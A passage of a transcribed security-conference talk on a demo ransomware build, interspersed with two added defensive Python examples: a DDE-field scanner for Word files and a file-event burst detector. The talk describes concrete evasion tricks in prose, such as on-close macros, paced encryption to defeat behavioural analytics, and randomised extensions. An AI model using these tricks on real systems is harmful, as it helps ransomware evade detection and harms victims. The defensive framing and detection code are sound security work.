see a lot of this stuff is because there are organizations in the background that are actually building it. It's a software industry. There's a help desk, so to say; for some of these things you can actually open tickets and they'll get back to you within 24 hours. Some of them have SLAs, okay? You need Bitcoin to pay for this, but you know. This was one that had been deactivated, so it was already pretty much useless, but if you use the usual tools you can actually recap it slightly and things like that. It's got, like you've got down here, it's hard to see, but in the profile you can add

things like anti-debugging, anti-OllyDbg, anti-VMware; you have all these additional aspects, right? So okay, this is really cool; it took me a couple of hours to put into place. Our problem two is this: you need a Russian friend, because most of the instructions are in Russian, except for the interface, which is in English, because you know, you have to sell to everybody. So this is the final product. Hopefully this will start. Yep, so there's the phishing email I built, a nice little phishing email. So the guy opens the file, it says enable content. Now, interestingly enough, I made it really cool, so you saw it actually had some action to make the user more

susceptible: originally the file was encrypted, and you know, he had to click enable to decrypt it, so it decrypted. Now, one of the things with some of these tools is that this actually inserted an on-close macro, okay? Because one of the things, if you're doing evasion techniques, and especially if you're trying to evade some of these malware detection systems, but also the explosion systems like FireEye and stuff like that, is that they all look for the on-open, right? So there's the on-open, and this is running; it's just the video's quite slow, and there's a reason for that. Well, it's not slow, it's just that this is the time it takes. So by doing it on close you're

avoiding some of those detection systems, right? I've also introduced a significant time delay. Anybody know why I wanted a significant time delay? Yeah, yeah. So, by this, and remember I'm doing a demo environment here, I'm trying to show potential customers the issue. So there, now I have the ransomware notice up and running; if I go back to my source files, they're all encrypted. So there's a significant delay and that's intentional. So the issue: without the dropper, without using Gaudox, the initial dropper was simple, right? The encryption program was simple to do. The challenge really is to introduce those exploit kits like Gaudox and build that system and do the advanced techniques.
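The DDE delivery described earlier (an Excel or Word file that launches CMD on open without any VBA) bypasses the "is there a macro?" question entirely, so a mail gateway or triage script needs to look at the field instructions themselves. Below is an added example written for this page, not the speaker's tooling: a scanner that unpacks a .docx and reports any Word field whose instruction starts with the DDE or DDEAUTO keyword, reassembling the keyword when it is split across several `<w:instrText>` runs. The two sample documents are constructed in memory, and the DDE target in the flagged sample is a placeholder string, not a working command.

```python
"""DDE-field scan for Office Open XML documents (added example). Word keeps
field instructions in <w:instrText> runs between fldChar begin/separate
markers inside word/document.xml; a DDE or DDEAUTO instruction there makes
Word ask to launch an external program on open, with no VBA involved."""
import io
import re
import zipfile

# Field keywords that trigger Dynamic Data Exchange in Word.
DDE_KEYWORDS = ("DDE", "DDEAUTO")
# One complex field: from its "begin" marker up to "separate" or "end".
FIELD_RE = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="begin"[^>]*>(.*?)'
    r'<w:fldChar[^>]*w:fldCharType="(?:separate|end)"', re.S)
INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
# Word may also store a whole field in a single simple-field element.
FLDSIMPLE_RE = re.compile(r'<w:fldSimple[^>]*w:instr="([^"]*)"', re.S)


def field_instructions(docx_bytes: bytes) -> list:
    """Return (part name, instruction) for every field in the word/ parts.
    Runs belonging to one field are joined so a keyword split across runs
    (DDE + AUTO) is still seen as one token."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = z.read(name).decode("utf-8", "replace")
            for body in FIELD_RE.findall(xml):
                found.append((name, "".join(INSTR_RE.findall(body)).strip()))
            for instr in FLDSIMPLE_RE.findall(xml):
                found.append((name, instr.strip()))
    return found


def has_dde(instr: str) -> bool:
    """True when the first token of a field instruction is a DDE keyword."""
    tokens = instr.strip().split()
    return bool(tokens) and tokens[0].upper() in DDE_KEYWORDS


def scan_docx(docx_bytes: bytes) -> dict:
    instrs = field_instructions(docx_bytes)
    hits = [(part, i) for part, i in instrs if has_dde(i)]
    return {"fields": len(instrs), "dde": hits, "flag": bool(hits)}


def make_docx(document_xml: str) -> bytes:
    """Constructed minimal .docx container around a document.xml body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def benign_sample() -> bytes:
    """Constructed document with an ordinary DATE field."""
    xml = ('<w:document><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           '<w:r><w:instrText xml:space="preserve"> DATE \\@ "d MMMM yyyy" </w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
           '<w:r><w:t>27 April 2018</w:t></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
           '</w:p></w:body></w:document>')
    return make_docx(xml)


def dde_sample() -> bytes:
    """Constructed document with a DDEAUTO field whose keyword is split across
    runs; the application/topic are placeholders, not a real command."""
    xml = ('<w:document><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           '<w:r><w:instrText>DDE</w:instrText></w:r>'
           '<w:r><w:instrText>AUTO </w:instrText></w:r>'
           '<w:r><w:instrText>PLACEHOLDER_APP "PLACEHOLDER_TOPIC"</w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
           '<w:r><w:t>placeholder</w:t></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
           '</w:p></w:body></w:document>')
    return make_docx(xml)


if __name__ == "__main__":
    print("benign:", scan_docx(benign_sample()))
    print("dde:   ", scan_docx(dde_sample()))
```

Matching on the first token of the reassembled instruction, rather than grepping the raw XML for the string `DDEAUTO`, is what makes the check robust to the run-splitting that document generators and obfuscators produce; the same approach extends to Excel workbooks by reading the `<f>` formula elements under `xl/worksheets/`.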

The script and dropper and Word file took me less than 24 hours to write, okay, including the thinking part and everything like that. That was that third picture at the beginning, of me; that was me thinking hard, also half asleep. But it pays, okay? There are studies that 38% of ransomware victims in 2016 were paying the ransom, but worse was that 59% of users, even in enterprises, were paying out of their own pocket because they were afraid to go to the IT help desk and say, oh, I've hit a bad email and my station's encrypted. They were afraid of being punished, you know, and that's a cultural shift in an organization. Some of the reasons that this works are

because we've introduced such scare tactics on our users, saying if this happens to you, you know, you [ __ ] the organization and all this, and you're bad, and blah blah blah. No, we need to think about awareness, right? Because this is what happens: 59% of hit victims will pay out of their own pocket because they don't want to be in trouble with the organization. So we need a better way to do user awareness when it comes to this type of activity. So if you think about my effort of 24 hours and the potential payout, this is a good return on investment, guys, especially when you look at some of them that are asking for, like, $500 to get the

decryption key, right? I did do a version with a standalone executable in C, C#; it took me a little bit longer but it was still within a week. So in a week, if I was a malicious person and I got 5 or 10 people to pay, right, $500 a pop, that's five grand for a week's worth of effort. I mean, I don't make that much money in a week. Of course it is illegal, and the difference is that potentially you could get into some serious trouble. So by selecting an interpreter-type solution, most AVs won't trigger, and this is why it's going past; and some

next-generation systems don't trigger either, quite a few actually. The problem is most next-generation solutions have this switch in their configuration which is "block scripts". So if you don't hit this switch, it doesn't block any scripting stuff; it only blocks executables, right? So you've got to be careful: if you're in the defense scenario, even if you're going into some of this next-generation endpoint protection stuff, you need to be careful about the settings. There's a reason that they don't do those script-blocking techniques: it's because a lot of organizations use scripts to manage their infrastructure, right? How many of you run AD structures? You have a GPO; does your

GPO deploy scripts to configure the workstation? That would be blocked if you turned on script blocking. So if you start to introduce exploit kits, depending on how old they are, then you start to get detected, because that exploit kit is actually a RAT; it's actually doing, you know, zero-day-type activity, so it's actually looking to exploit the machine, so there's a little bit more structure. I also did some UEBA, right, so endpoint behavioral analytics; I tested some of that stuff too. They look for a massive file modification pattern, massive file modifications over a short period of time, right? That's how they catch the ransomware. They introduce latency into the loop to stop that, right?

If you have your script running in the background and you say encrypt one file, wait a few minutes, encrypt another file, your behavioral analytics doesn't work. Tested it. That was tested with a product that I shall not name because I can't, but you're smart, you'll figure it out. Detection sometimes happens through filename extensions, right? So there are two problems with that. Number one is that the file rename usually happens after you've encrypted the file, so you're already too late; you might be able to block half of the encryption over this, but you've basically lost part of your files. In an enterprise environment that's okay, because you've only lost

part of your files; you can always recover those, it's easier to recover. But there's an easy way to get around that: you randomize the extension on each launch. I haven't been working on that yet, but each time you deliver your ransomware you basically change the encryption and the file extension. Most of the file extension detections are pre-embedded into the configuration of the endpoint security solution; it's a list that they have based on, you know, existing knowledge of which ransomwares are going out. So there are ways to bypass all this stuff, and that's one of the things that I could probably go back into actually now, which is where we get

to the evolution of this. The idea here, what I had, was essentially to evolve this system to see how I could get through evasion without actually going into dropping in exploit techniques and things like that, because there are simple ways to avoid detection, like introducing latencies and things like that. So, right, I've stopped doing it. I stopped doing it for one reason: one of my actual cats got sick, and it was very expensive to get him fixed, and I hesitated, all right? But I don't do anything illegal. So thank you, that's something. We're just on time, right? Yeah, so if you have any questions. [Applause]
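Two detection gaps come up in the endpoint discussion above: behavioral analytics that count mass file modifications over a short window are defeated by pacing the encryption, and extension-based detection that relies on a pre-embedded list of known ransomware suffixes is defeated by a random extension per campaign. The following is an added example written for this page, not the speaker's tests or any vendor's product: a sliding-window burst detector per process, plus an allowlist check on renames (report any extension the fleet has never used rather than matching a blocklist). The event layout, thresholds, known-extension list and telemetry are all constructed for the illustration, and the paced process is deliberately left unflagged to show the gap the talk describes.

```python
"""Endpoint file-event heuristics (added example): a sliding-window burst
detector for mass modifications per process, and an allowlist check on
renames to extensions the fleet has never used. Event tuples are
(ts_seconds, pid, action, path[, new_path]); constructed for this example."""
from collections import defaultdict, deque

# Tunables (assumed): N document modifications within WINDOW seconds.
BURST_THRESHOLD = 20
WINDOW_SECONDS = 60
DOC_EXTS = {".docx", ".xlsx", ".pdf", ".txt", ".jpg"}
# Extensions known to occur on this fleet (assumed allowlist). Anything else
# on a rename is reported, so a random per-campaign suffix still surfaces.
KNOWN_EXTS = DOC_EXTS | {".zip", ".pptx", ".tmp", ".bak"}


def ext_of(path: str) -> str:
    dot = path.rfind(".")
    return path[dot:].lower() if dot >= 0 else ""


def detect(events) -> dict:
    """Return {'bursts': {pid: ts_first_flagged}, 'odd_renames': [(pid, new_path)]}."""
    windows = defaultdict(deque)  # pid -> timestamps of recent doc modifications
    bursts = {}
    odd_renames = []
    for ev in sorted(events, key=lambda e: e[0]):
        ts, pid, action = ev[0], ev[1], ev[2]
        if action == "modify" and ext_of(ev[3]) in DOC_EXTS:
            q = windows[pid]
            q.append(ts)
            while q and ts - q[0] > WINDOW_SECONDS:  # drop events outside the window
                q.popleft()
            if len(q) >= BURST_THRESHOLD and pid not in bursts:
                bursts[pid] = ts
        elif action == "rename":
            new_ext = ext_of(ev[4])
            if new_ext and new_ext not in KNOWN_EXTS:
                odd_renames.append((pid, ev[4]))
    return {"bursts": bursts, "odd_renames": odd_renames}


def sample_events() -> list:
    """Constructed telemetry: pid 100 edits 25 documents in 10 s; pid 200
    makes the same 25 edits spaced three minutes apart (the pacing trick);
    pid 300 renames one file to a made-up extension and one to a known one."""
    ev = []
    for i in range(25):
        ev.append((1000 + i * 0.4, 100, "modify", f"/home/u/docs/f{i}.docx"))
    for i in range(25):
        ev.append((2000 + i * 180, 200, "modify", f"/home/u/docs/g{i}.xlsx"))
    ev.append((3000, 300, "rename", "/home/u/docs/h.pdf", "/home/u/docs/h.pdf.xk7q"))
    ev.append((3001, 300, "rename", "/home/u/docs/old.txt", "/home/u/docs/old.bak"))
    return ev


if __name__ == "__main__":
    print(detect(sample_events()))
```

Running it shows pid 100 flagged on its twentieth edit and pid 200 never flagged, which is exactly the pacing bypass described in the talk; the usual answer is a second, much longer window (or a cumulative per-process count of document rewrites) so that slow encryption still accumulates into an alert, traded off against the noise from legitimate batch jobs. The rename check flags `.xk7q` without ever having seen it, which is the advantage of an allowlist over a list of known ransomware extensions.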